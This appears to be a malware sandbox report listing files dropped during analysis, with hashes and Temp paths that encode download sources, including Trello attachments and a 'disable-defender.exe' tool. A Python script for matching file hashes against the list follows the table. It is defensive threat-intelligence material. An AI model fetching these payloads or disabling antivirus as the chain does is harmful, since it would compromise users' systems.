SHA512ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
-
Filesize
85KB
MD534a87206cee71119a2c6a02e0129718e
SHA1806643ae1b7685d64c2796227229461c8d526cd6
SHA256ecea49f9a754af7055b60a860acfd8ce2bc63048c947c9ee6324f07d45c4787d
SHA512e83b0e003687ebe5d5df5bd405b12b267e07252838d1575dc390b409e03279f9d0ce4a4691971a9601f58d52e55af2fa8ea9596ace4bef246f9ef511b65cdbc3
-
Filesize
21KB
MD5c7aa449a4050a54f67400acf3defd02a
SHA1e64d746aca3186259f8b7552bf4f6c31b8fa2888
SHA256dd8f277b22b3da6d4f43af9a5a4bf9515b829d0ffa0a1be6a5ecf5a7e8458b86
SHA512d3f255641caff4e5c3c49407606155aff5aa9fb01bc586abe7fe54f212fcd531f74b13d55423c282ed59550680b354e9fa53c74d4c5707683e4bc44cd11080ca
-
Filesize
14KB
MD5fce292c79288067dc17919ed588c161c
SHA1bb44fa2c95af5bbd11e49264a40c16d6f343fa21
SHA2564ef8146d85d60c2867bdbe44304b5ba00cceb208f4c10c9f91183308e1da3828
SHA51273dac29753044a720fc43b4ee19d320e06855167cdf0ebf329207aa16faa13fd6d2937bd87b54e544dd8d4c3da634773abd73769d3915154099ff01e6e03033e
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
16KB
MD5a76f80e16b25c2a742556f5f056210d2
SHA1d416745be1fdfd426dfe02afe49a0dced4642068
SHA256afe3430f3920bc4055b9b207e68dce401076b189203d043b52a060ee2e1c0d8c
SHA512d7ed6d6f8a8475eb5a20e90de7127b7b1c5967bc49482bf83b36d0eb5998de9444cf776fa8f4a3ac002f6f2d52aa55183f017747c46c87afaa81202bce4a0f5f
-
Filesize
18KB
MD5a649726ca269f263b47dcc949a3f6dbb
SHA15921f608cd5b64c915f1e0eec064718bb03fa773
SHA256645db86ee42fbcabdbe914895dfebaaaf540cf4118b85d1b3746f36e0a2648f2
SHA512f7825f85d82aec8239bfd0bc6fd72abce68f95232cd38b73a238d31609eea7a9184513173801414cdbb15b57396a7a597b8786727f8ad9536ce235a5930a3132
-
Filesize
18KB
MD5ed0d362a7850d0b9bb6e2e92397403c0
SHA16067f5a2d89113dc957f2dcfeae3d535f6f8d15c
SHA25665eaafb526d4c6023e86b5a3f8e3a9a5b6b8e19d7b19c02c52eeee1f33b6941e
SHA51205b15d66b55819a695bb089594f41b9bbd6b5633b8c2d0048e859e6cc55e1f1f893a62b23a51fda18e9a7358ecfdf4b7b0b49e118eaf8406436978acbbec3dbd
-
Filesize
64B
MD513af6be1cb30e2fb779ea728ee0a6d67
SHA1f33581ac2c60b1f02c978d14dc220dce57cc9562
SHA256168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f
SHA5121159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413
-
Filesize
19KB
MD5630a6750931770737d5b52c1de7e647e
SHA1306a4f22366f2eb85e363311498ba79aa6a53851
SHA256d7571a0e7ffb481e1758a179351ab24b7f0baf0dcbdf50004dfc0c79af60d909
SHA512722f9f56e1f895d3a2da61b0dc6705a152d5b414f1274241b9f87ae77b1e45ceccdd46fff7784e3b2c333e8ed21c152f6ff965e7620ac5c69d6be25c6659fab4
-
Filesize
15KB
MD5ae80c2751908321053afc34b2045431a
SHA12dc49ecda125d201844a85fd12695a69805a9c21
SHA256dc38704a49ceecd146968aff8e80a6065b3d140cb8ea91c53c9e0cf9a518cdfa
SHA512f91990daaa922612a2a0123adbc60d4faeceddb1196edb045b6c1bfea12389246f38e9e22e8d62ae3d453f0f89398860bb3d8d54970f047974211a46ef362061
-
Filesize
1KB
MD5e2967bd8965bfd1fd7c079c7f07f5c6c
SHA1e01b51e79b72f51ce35a962d9f56e1c52712fec0
SHA2567ead4738f5de21c6abecf3199826377ce03691c02f241ac95d7355bae9b667ca
SHA51202103363b4e3a024dd82acf8cdf20491a1644b18f3617862d03aa4ef3f6762c10f67d1fd01e11656fc5c8a749ff439241ab0ef7138a5fd7b55759a5188a4b7f1
-
Filesize
837KB
MD53ecf5cab8e919a5bb0c047bd80e5dfee
SHA14abdb1574cec441b1efdea63f1a30b3318bad32e
SHA256c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc
SHA5123b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f
-
Filesize
85KB
MD510ffc145e1c09190a496a0e0527b4f3f
SHA1e21fba21a11eecb4bc37638f48aed9f09d8912f6
SHA25680b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d
SHA512bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d
-
Filesize
21KB
MD5837d57d98e4afcbe2aa6210240a02c8e
SHA156e96962a306a3d5bec484d13a88bcb516ebbca9
SHA256c72da8d9d76f3ce218c1e072b6752590c7b9fd977acac39a2f0b88d906fa401d
SHA51258a515bbe9626da5c233fef471278ee79fa517648ff4e95cf9fc221d1215afd6c91d32db0171397940f0935ff230706f1ef3c1284ab4bcdc3c3e1632a4277cbb
-
Filesize
8KB
MD580f97c916a3eb0e5663761ac5ee1ddd1
SHA14ee54f2bf257f9490eaa2c988a5705ef7b11d2bc
SHA2569e06f61d715b1b88507e3e70390721ab7ab35d70fe2df6edaaf0e565783e7d2f
SHA51285e30cfc5c02543820f884602701986aa1e40d587da13c35b76b80dc95c0d6b3e18f5b0ad083fcfa3e9b92935306e4f8faec36ac28ac25e53fb03dcba4a092a6
-
Filesize
14KB
MD52f4ab1a4a57649200550c0906d57bc28
SHA194bc52ed3921791630b2a001d9565b8f1bd3bd17
SHA256baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa
SHA512ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD5e91c0579b42ee928086c94b86e1bff2b
SHA1eb4596bf9e8116a27a97981bfe0987e9a4cfad9a
SHA256928b1a849e27a2217c34199889138bb341231c64463e33c53264a50665ad3a99
SHA512f5f7651f20bfb2542f90d65f663fc730604636b3e44e8eacadaf073169eae6c2e13b5614885bd11616eea438c7a05683ac318caf4a0c06de210a5f6426cccb2b
-
Filesize
523KB
MD51111e9594bfe8eadbeea0af21529405b
SHA178305398a68d3e4d8113ecdba0b3fc703c9cf1db
SHA256d87864a983d21cd688db20a3a871e1faf8d3aaea23e54c0388bc448b059c25cf
SHA512c8c573cdbe7197ae6c53f13ab04d3c41d622f7e7396a6915f95576ce47f1acbc32f65f17063a6d3d44fbb4698ac3c2bcbed3050dd736b079f28b11451153ac82
-
Filesize
521KB
MD5068c05b9f062da142d266a374866d3bb
SHA1315726e1015e1e69cf9645bda713f463e93a8755
SHA256cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a
SHA51225358882e596ed9299ef714e2168a70e7bceace7fafc9f61e10e2fb58b480b97f31af86ef08e553cfe69546aa8b056b09df696d5fa9e07e2784392e8bbd87156
-
Filesize
2.2MB
MD5f5c067857341d7ae2c37bfdaf6eba67d
SHA16b3d740cd7890fa9571234d362792679b8f4d8a2
SHA256c410153c7fa76bb1c5bf7f6f2549338b19b64ea9e65ad1c680a5612998612770
SHA5121be78a8bd0cdb8bdbc8a1ef6f6d5f4b438ddab962247c8bb353bceb1493398e02026c142fd7d587d5ccbbf4bcb9aa97abd6eadae8a11b9c154c503919fd38017
-
Filesize
939KB
MD53aae236a68115126ac52a54816a19894
SHA1fdf5b359dc36df65976133e3f85afb23d0279b8b
SHA25618dcdd5f689cac6a57439a05f256f213ac5547b2cbef6aa50d2eec82e07f44d4
SHA512c9cc328e6f47f5ff1718278e956da9eae11a0b13b9dd0a65adc5177b8bbdaaa7888fc42c1e1064c4664050df873bfcad904ff01beffb4bc4ec713ffb91223508
-
Filesize
84KB
MD5161a475bfe57d8b5317ca1f2f24b88fa
SHA138fa8a789d3d7570c411ddf4c038d89524142c2c
SHA25698fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54
SHA512d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547
-
Filesize
9KB
MD562b97cf4c0abafeda36e3fc101a5a022
SHA1328fae9acff3f17df6e9dc8d6ef1cec679d4eb2b
SHA256e172537adcee1fcdc8f16c23e43a5ac82c56a0347fa0197c08be979438a534ab
SHA51232bd7062aabd25205471cec8d292b820fc2fd2479da6fb723332887fc47036570bb2d25829acb7c883ccaaab272828c8effbc78f02a3deeabb47656f4b64eb24
-
Filesize
3.2MB
MD506c29044529a1f599c024af3487bdafb
SHA1ce66469fbc68b8f472f1a331c7b05b0ac9a9a874
SHA256da74bb0561749c9c0215f9a885ea2523aa6e2e956f6972a1a77d3e395144c998
SHA51283f6f51b2938224e5732c8102c96049c5396e88dff9c14bc5446ee95c555590a393429fc5b6112122d16bcc1898cedeaa134dc935f9b1e5a84cbfc2fa2ed1871
-
Filesize
2.8MB
MD5e670bdc7c82eee75a6d3ada6a7c9134e
SHA1b0f0bab6f6e92bc86e86fd7bff93c257a4235859
SHA256a5cf4844df86abc9222fe436dbc0726e09383a61f4708cdc1a3e8a89cc3540fb
SHA5127384550bb19ccc11243b79d3bfc9c3f25dce84de64891e7f7eb078b246bfedcd26a958a019a3a7b4ecf5ee1c4e8c8d44790f5c958a58266e5676f3a8e58f4643
-
Filesize
1.3MB
MD55e13199a94cf8664e5bfbe2f68d4738e
SHA18cfaa21f68226ae775615f033507b5756f5ccacc
SHA25671b320a5d9456acc43494213dcd1f4ae8b7f6e27a15ac80cb42df5f19f692ec5
SHA512b7b682717cd49b9fff9885c85f1421050613559308aa7160dee7ce493d5bff126c8157727d8f88fdfd602092203c64ab0dbff718b7ce7af9f9f2ad8375d703b5
-
Filesize
2.7MB
MD57162024dc024bb3311ee1cf81f37a791
SHA1be03705f33a8205f90330814f525e2e53dfb5871
SHA2563e39efae22fcda501f858229af27be129f178c85723d4477ef9be2f80b61a8fd
SHA51294652b8b770fcdd70ee5059b56ce84aee50c46901b6311e2a602cdb4d97b15abd0148ba4e55f225f722d125bf9c3969185bcefaf07f3911a4347d9a0ca8d2d38
-
Filesize
2.7MB
MD55347852b24409aed42423f0118637f03
SHA16c7947428231ab857ee8c9dab7a7e62fdeed024b
SHA256a2e678bb376d2dcec5b7d0abac428c87cd8ae75936e28c03cb4232ae97015131
SHA5120a52f226be962eb8187f444657317d3e0385d9d47d507e6f1c028143f57153a7b8e34ef7b0c8732bb3b3d361da483a13264f511ca5c80cedda3bc439fe936991
-
Filesize
164KB
MD5959db6fb58d86b24436a5228fdf1cd01
SHA1fcbcb37c41b3da1c72959bd5bb234217dbdb33fb
SHA256b39e67fdff8dad1a8f64c0d2a01e312cdecd3d64bbedd842b01216cb09f22c65
SHA512618be717e26c8c2d18f16c6711eaab5cd38fea8166d978dece183b2fb2f6d0af20bd592d518cdd06d1607dcfd11815aa1b1bb5be91a3a7c94096e5ba99772699
-
Filesize
7.6MB
MD5c228f16074d1919a6bf30642a6e6541e
SHA19857bac629403dad58ec15bb426bf5e6f5a006d7
SHA256c51d5d9f26091b859c64a0da81fd56382af4edf3137b4683763105f9b8d56cea
SHA5124f6bfa528305a754a11f9671641edab9f5136e71ae9fe3620948b8771ab70230ef233c4278116b86dafa1b6cf9fe46f525a4bc46e679db95f5307c6211e0f383
-
Filesize
381KB
MD572800fb37c56bcad3893460c67b763c8
SHA14bc0d2bc56087e8207a05de386446272a38962e9
SHA25657ad7fa33cefd28e1304bb8fc59d4be34537bf2527adbf8664f44a028f1f305d
SHA512f5f88756f808798de3e4df582cd2db4c53e7c7935b480b42a3e2c2e6b2526372ccd8ae5da84493d2680dce7448544d8d43e94ae07f1bdc03929097663e0e0e2a
-
Filesize
683KB
MD5859e4f75505f2ab3c7903eb3ce5d512f
SHA1b36d2a64dfeb1d8b4b445bcf22e3969a8277d0f0
SHA256ca4429856e10e17783fe464ca2787db610d3e25ae176c6585b2fd4ed5393e758
SHA512aaf5d55e0735ceae88a192c0cc94eafdcbf6c8ba78ad478b28d5866e4b3a3d96695ddd53efdab40764bbf87027b8457f18416a7f05b333eb5b3930ce37fab162
-
Filesize
5.5MB
MD5616756248d85c819fd0830d660a7aaa0
SHA10ead8b67e103d9ec95486781c70c2b35aa9ee287
SHA2561e2f5b51b09d3f0060700403f138e33cf4c085dde4fbb469c420e9fd840f04d3
SHA512b50326bcdc988e947df2c01552266aeea6bd148832496b4c29328f8751268c9840f72433019ee94925151913aad77020e146567cc0cffc5ffe65905f3070b406
-
Filesize
4KB
MD51ba45ed8ea192ec802ea88efda531a1e
SHA16f442f3c64cbf42abb0f85ff4fd6cef9998cfa15
SHA256982f98e95c0a9453ad51d9b5e06b3da5dd4174aa91a6e6b69a6113f4a6e7087a
SHA512979e1fd68f779aa1480c905a2d9a2b5b661faccd854418c529d52ea9e353038b0a8432349df42a3930691d84ada6f5e2042efbaa6cb9c77fce2541dbde7fbb6a
-
C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Filesize 30KB
MD5 761900700a2dd93bf347e10fa9c14fb7
SHA1 db4904470793b785fd6b06c17312be4111da02e9
SHA256 cd21730a2de2f182773c6b9ef50d34ed9f3d55a94b7e20a987e91843f14a057b
SHA512 ce8a9bcee08e28090b84a860895079a3ef2b686fadc89d8cb859bcd36efc65734a03c7b8392f2a451d14ef14cc559e2d00463fe09a2c3f6ff5d0338996e5b4bb
-
Filesize 66KB
MD5 00135a86ab829fc2d4678179d7a6e70f
SHA1 ef75c259865d7685d566b6e25b7a20d134952555
SHA256 0b8b21af69d0b465b7b8cd584bdba1f86d062bb0c7c51656f36a66fce8e9bd89
SHA512 011389f2bc93f45b36233238a32991823c3334e3259af98e7dd6cedb455fc930d5b603f51bb69e415ab24f285309eda0b272250f1ec82a21508de0681281a0ef
-
Filesize 267KB
MD5 0803c1aec008e75859877844cfa81492
SHA1 16924d5802ddf76a2096fcfade0ce06d4c0670bd
SHA256 d5ab98bd209db0ed18272fe616ea4b8be34fd13d36116d25793fa7aa6f8b33e3
SHA512 9001e77da2562652ae51bdb3b8b9bfe686d0ed0c4eb8d338b20b7c4eb6eb8e90a4fae01d8212b1908037d5ff456e982500e4907686c38e5c33e969d55ba914d9
-
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Filesize 294KB
MD5 10fc8b2915c43aa16b6a2e2b4529adc5
SHA1 0c15286457963eb86d61d83642870a3473ef38fe
SHA256 feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5
SHA512 421631c06408c3be522953459228d2e1d45eeeafce29dba7746c8485a105b59c3a2c0d9e2ffc6d89126cd825ffd09ebe7eb82223a69d1f5caf441feb01e57897
-
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
Filesize 45KB
MD5 e93bd9e06b8b09c7f697bff19e1da942
SHA1 a5efe9e9115a9d7ca92c3169af71546e254d062e
SHA256 de74d9f4418390f531456319015719dbcee1d5692b4b19800e7a492218d0badc
SHA512 6e43d19adf860cfdfc2a711ca72dd84f3376e514473077106f99f1aa0f509e6d5765d3499a52c13599674d33366f35fd3158a9c02ebdc045fb637e81986e0b08
-
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
Filesize 44KB
MD5 e7c5758f3aa16c6758567493d68d2d66
SHA1 4b7f6171df89ceae77ba75193efb235ff1a099af
SHA256 eb5e198c848019da509e83fff8f046f32b50758b28066e0a22cae53e4783faa6
SHA512 5a66b15aae538734c2e0ab2bd089d4bc8a79ee599fe5acff1b9e581a1076694995185e92d9a90a1000b3fc0a486ddda1c9cd972b38676753d60a97c700592b58
-
Filesize 1KB
MD5 6707df486205804693821eebad4c03f3
SHA1 fb4e723b632090036463d44e58ecedef4b688958
SHA256 cd78d5da40004dbaa8688d97063d1c9b3cee41ba72e8f9152ee38d86cf6efb50
SHA512 4b497ee77faeddae306b69a45641ab8f11ebbd9712664a614be009d6ab9632cb05f2025ae9631cb51801a4f6c2e3d48b38082b9b5fca41241ec5a0088c9e88ef
-
Filesize 231B
MD5 abe1dd23ab4c11aae54f1898c780c0b5
SHA1 bb2f974b3e0af2baa40920b475582bfd4fb28001
SHA256 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12
SHA512 e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d
-
Filesize 545KB
MD5 1ab2d7cc96ad2b86edf74d5497b45def
SHA1 baac72428aaff76788b6e0056b720c6920d0e6f8
SHA256 1e23a11308681733cff73f23933670c4350cec867042bbe5f7ff54a6dcc1dd83
SHA512 8b5a456b4a4c97e28b6e90735eb9a006e8afbcd3d588e04b7bd3ab24e20ef80e37cc08412cc421c0f465c148f5b1c181ea798585865bd82f9861c1a7351194a1
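The dropped-file table above is exported flat: on some rows the hash label is fused to its value ("MD510fc8b29..."), on others the label and value sit on separate lines. The Python below is an added example, not part of the sandbox report or its tooling. It parses that listing into records, indexes every digest, and matches the hashes of an arbitrary file against the set, so the table can be used as an IOC list. The two sample entries are copied from the listing above; the bytes checked at the end are constructed and match nothing.

```python
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Two entries copied from the dropped-files listing above, in the flattened
# form the report exports (fused label/value on one line, or split over two).
# Entries are separated by a lone "-".
SAMPLE_LISTING = r"""
-
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Filesize294KB
MD510fc8b2915c43aa16b6a2e2b4529adc5
SHA10c15286457963eb86d61d83642870a3473ef38fe
SHA256feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5
SHA512421631c06408c3be522953459228d2e1d45eeeafce29dba7746c8485a105b59c3a2c0d9e2ffc6d89126cd825ffd09ebe7eb82223a69d1f5caf441feb01e57897
-
Filesize
231B
MD5 abe1dd23ab4c11aae54f1898c780c0b5
SHA1 bb2f974b3e0af2baa40920b475582bfd4fb28001
SHA256 89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12
SHA512 e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
UNIT = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# Longest labels first so "SHA512..." is not read as "SHA1" + "512...".
LABEL_RE = re.compile(r"^(Filesize|SHA512|SHA256|SHA1|MD5)\s*(.*)$")
SIZE_RE = re.compile(r"^([0-9]+(?:\.[0-9]+)?)\s*(B|KB|MB|GB)$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class DroppedFile:
    path: Optional[str] = None          # absent when the report omitted it
    size_bytes: Optional[int] = None
    hashes: Dict[str, str] = field(default_factory=dict)  # algo -> lowercase hex


def parse_size(text: str) -> int:
    """'294KB' -> 301056; '7.6MB' -> 7969177 (truncated)."""
    m = SIZE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return int(float(m.group(1)) * UNIT[m.group(2)])


def parse_listing(text: str) -> List[DroppedFile]:
    records: List[DroppedFile] = []
    cur = DroppedFile()
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if line == "-":                      # entry separator
            if cur.hashes or cur.path or cur.size_bytes is not None:
                records.append(cur)
            cur = DroppedFile()
        elif PATH_RE.match(line):
            cur.path = line
        else:
            m = LABEL_RE.match(line)
            if not m:
                raise ValueError(f"unexpected line: {line!r}")
            label, value = m.group(1), m.group(2).strip()
            if not value:                    # label alone: value is on the next line
                if i >= len(lines):
                    raise ValueError(f"{label} has no value")
                value, i = lines[i], i + 1
            if label == "Filesize":
                cur.size_bytes = parse_size(value)
            else:
                # Length check catches a mis-split label/value boundary.
                if not re.fullmatch(r"[0-9A-Fa-f]{%d}" % HASH_LEN[label], value):
                    raise ValueError(f"bad {label} digest: {value!r}")
                cur.hashes[label] = value.lower()
    if cur.hashes or cur.path or cur.size_bytes is not None:
        records.append(cur)
    return records


Index = Dict[Tuple[str, str], DroppedFile]


def build_index(records: List[DroppedFile]) -> Index:
    return {(algo, d): rec for rec in records for algo, d in rec.hashes.items()}


def lookup(index: Index, algo: str, digest: str) -> Optional[DroppedFile]:
    return index.get((algo.upper(), digest.strip().lower()))


def match_bytes(index: Index, data: bytes) -> Optional[DroppedFile]:
    """Hash a candidate file with every listed algorithm and look each up.
    Strongest first: an MD5 or SHA1 hit alone is weaker evidence than SHA256."""
    for algo, fn in (("SHA512", hashlib.sha512), ("SHA256", hashlib.sha256),
                     ("SHA1", hashlib.sha1), ("MD5", hashlib.md5)):
        hit = lookup(index, algo, fn(data).hexdigest())
        if hit is not None:
            return hit
    return None


if __name__ == "__main__":
    idx = build_index(parse_listing(SAMPLE_LISTING))
    # Constructed bytes, not a real dropped file: expected to match nothing.
    print(match_bytes(idx, b"constructed bytes, not a dropped file"))
```

For triage, point `match_bytes` at files recovered from a host (`open(p, "rb").read()`) or feed the full listing to `parse_listing`; the length check on each digest is what keeps a fused "SHA1" + "0c15..." row from being mis-read.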